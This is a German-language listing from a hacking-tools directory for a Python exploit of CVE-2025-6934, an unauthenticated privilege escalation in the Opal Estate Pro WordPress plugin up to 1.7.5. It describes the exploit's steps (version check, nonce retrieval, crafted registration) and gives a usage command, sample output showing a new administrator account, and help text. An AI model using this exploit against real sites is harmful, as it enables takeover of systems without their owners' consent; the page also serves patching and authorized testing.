Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6934 — Opal Estate Pro <= 1.7.5 – Nicht authentifizierte Privilegieneskalation | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-6934
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-6934

CVE-2025-6934

Opal Estate Pro <= 1.7.5 – Nicht authentifizierte Privilegieneskalation

Repository anzeigen
921vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ CVE-2025-6934 - Nicht authentifizierte Privilegieneskalation in Opal Estate Pro

📝 Beschreibung

Das Opal Estate Pro – Property Management and Submission-Plugin für WordPress, das vom FullHouse - Real Estate Responsive WordPress Theme verwendet wird, ist in allen Versionen bis einschließlich 1.7.5 anfällig für Privilegieneskalation.


  • CVE-ID: CVE-2025-6934
  • CVSS-Score: 9.8 (Kritisch)
  • Veröffentlicht: 30. Juni 2025

⚙️ Skript-Informationen

Dieser Python-Exploit automatisiert den Prozess der Privilegieneskalation, indem er:

  • die anfällige Plugin-Version über readme.txt überprüft.
  • die erforderliche Nonce von der Registrierungsseite abruft.
  • eine manipulierte Registrierungsanfrage sendet, um Administratorzugriff zu erlangen.

🚀 Verwendungsbeispiel

root@kitploit:~
python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234

📤 Beispielausgabe

root@kitploit:~
[•] Plugin Version Check:
    [+] Vulnerable version detected: 1.7.5

[•] Exploit Attempt Started
    [+] Nonce Found: 70dd70630b
    [+] HTTP Status: 200

[✔] Exploit Successful!
    --------------------------
    Username : nxploitedadmin
    Email    : [email protected]
    Password : nxp1234
    Role     : administrator
    --------------------------

Exploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited

🛠️ Argumente & Hilfe

root@kitploit:~
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD

CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL (e.g., http://site.com/path/)
  -mail, --newmail NEWMAIL
                          Email to register as admin
  -password, --newpassword NEWPASSWORD
                          Password for new admin user

⚠️ Haftungsausschluss

Dieses Skript dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests.
Die unbefugte Verwendung dieses Tools gegen Ziele ohne Zustimmung ist strengstens untersagt.


Von: Khaled_alenazi (Nxploited)

Tool herunterladen